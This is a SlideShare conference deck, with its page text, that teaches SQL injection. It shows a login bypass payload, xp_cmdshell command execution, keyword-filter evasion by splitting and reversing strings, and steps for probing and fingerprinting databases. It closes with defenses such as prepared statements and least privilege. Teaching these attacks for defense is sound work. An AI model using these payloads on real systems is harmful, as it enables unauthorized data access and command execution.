How Did I Steal Your Database<br />Mostafa Siraj<br />@mostafasiraj<br />
Agenda<br />Noooo, it kills suspense<br />
DISCLAIMER<br />Hacking websites is ILLEGAL<br />This presentation is meant for educational purposes ONLY<br />Only use th...
SQL Injection<br />What is it?<br />The application dynamically generates an SQL query based on user input, but it does no...
SQL Injection Example, Bypassing Logon<br /><ul><li>Original SQL Query</li></ul>String sqlQuery = "SELECT * FROM user WHER...
MS SQL Server: Execute OS command xp_cmdshell
Set username to '; exec master.dbo.xp_cmdshell "dir";-- produces</li></ul>SELECT * FROM user WHERE <br />name=''; exec mas...
Let's play Hide and Seek<br />Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --<br />Defen...
Finding SQL Injection Bugs<br />
Finding SQL Injection Bugs<br /><ul><li>Submit single quotation mark and observe the result
Submit two single quotation and observe the result
Identify the database (e.g.</li></ul>Oracle: ‘||’FOO<br />MS-SQL: ‘+’FOO<br />MySQL: ‘ ‘FOO      [note the space btw the 2...
Finding SQL Injection Bugs<br /><ul><li> For multistate processes, complete all the states before observing the results
 For search fields try using the wildcard character %</li></li></ul><li>Finding SQL Injection Bugs<br /><ul><li> For numer...
Inject into different statement types<br /><ul><li> You can do the same for all SQL statements (INSERT, UPDATE or DELETE)
 Watch out when injecting in UPDATE or DELETE</li></li></ul><li>Demo<br />WebGoat<br />
Demo<br />HacmeBank<br />
Demo<br />Using UNION Operator<br />
Upcoming SlideShare
Loading in …5
×

How did i steal your database

5,452 views

Published on

The session describes some advanced SQL injection techniques

Published in: News & Politics, Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,452
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
161
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

How did i steal your database

  1. 1. How Did I Steal Your Database<br />Mostafa Siraj<br />@mostafasiraj<br />
  2. 2. Agenda<br />Noooo, it kills suspense<br />
  3. 3. DISCLAIMER<br />Hacking websites is ILLEGAL<br />This presentation is meant for educational purposes ONLY<br />Only use this stuff on YOUR website and YOUR account<br />
  4. 4. SQL Injection<br />What is it?<br />The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query. <br />
  5. 5. SQL Injection Example, Bypassing Logon<br /><ul><li>Original SQL Query</li></ul>String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND <br />pass='" + password + "'“<br />…..<br /><ul><li>Setting username to Mostafa & password to ' OR '1'= '1 produces</li></ul>SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'<br /><ul><li>Attacker is logged on without Authentication</li></li></ul><li>Not only your web app and DB are at risk<br /><ul><li>Depending on the DB, an attacker can access the operating system
  6. 6. MS SQL Server: Execute OS command xp_cmdshell
  7. 7. Set username to '; exec master.dbo.xp_cmdshell "dir";-- produces</li></ul>SELECT * FROM user WHERE <br />name=''; exec master.dbo.xp_cmdshell "dir"; --<br />Note: dir list directory content<br />
  8. 8. Let's play Hide and Seek<br />Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --<br />Defender: Disallow double quotes:<br />Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --<br />Defender: Filter out string “xp_cmdshell”<br />Attacker: ';declare @a varchar(1000);<br />set @a = 'master.dbo.xp_' + 'cmdshell dir';<br />exec (@a);--<br />Defender: Filter out “xp”, “cmd”, “shell”, ….<br />Attacker: ';declare @a varchar(1000);<br />set @a = reverse('rid llehsdmc_px.obd.retsam');<br />exec (@a);--<br />
  9. 9. Finding SQL Injection Bugs<br />
  10. 10. Finding SQL Injection Bugs<br /><ul><li>Submit single quotation mark and observe the result
  11. 11. Submit two single quotation and observe the result
  12. 12. Identify the database (e.g.</li></ul>Oracle: ‘||’FOO<br />MS-SQL: ‘+’FOO<br />MySQL: ‘ ‘FOO [note the space btw the 2 quotes]<br />
  13. 13. Finding SQL Injection Bugs<br /><ul><li> For multistate processes, complete all the states before observing the results
  14. 14. For search fields try using the wildcard character %</li></li></ul><li>Finding SQL Injection Bugs<br /><ul><li> For numeric data, if the original value was 2 try submitting </li></ul>1+1 or 3-1<br /><ul><li> If successful try using SQL-specific keywords, e.g. </li></ul> 67-ASCII(‘A’)<br /><ul><li> If single quotes are filtered try</li></ul> 51-ASCII(1) [note ASCII(1)=49]<br />
  15. 15. Inject into different statement types<br /><ul><li> You can do the same for all SQL statements (INSERT, UPDATE or DELETE)
  16. 16. Watch out when injecting in UPDATE or DELETE</li></li></ul><li>Demo<br />WebGoat<br />
  17. 17. Demo<br />HacmeBank<br />
  18. 18. Demo<br />Using UNION Operator<br />
  19. 19. Demo<br />MS-SQL Error<br />
  20. 20. Solution<br /><ul><li> Validate the input -accept only known good-
  21. 21. Process SQL queries using prepared statements, parameterized queries, or stored procedures.
  22. 22. Enforce least privilege
  23. 23. Avoid detailed error messages
  24. 24. Show care when using stored procedures (e.g. exec)</li></li></ul><li>Thank You<br />@mostafasiraj<br />

×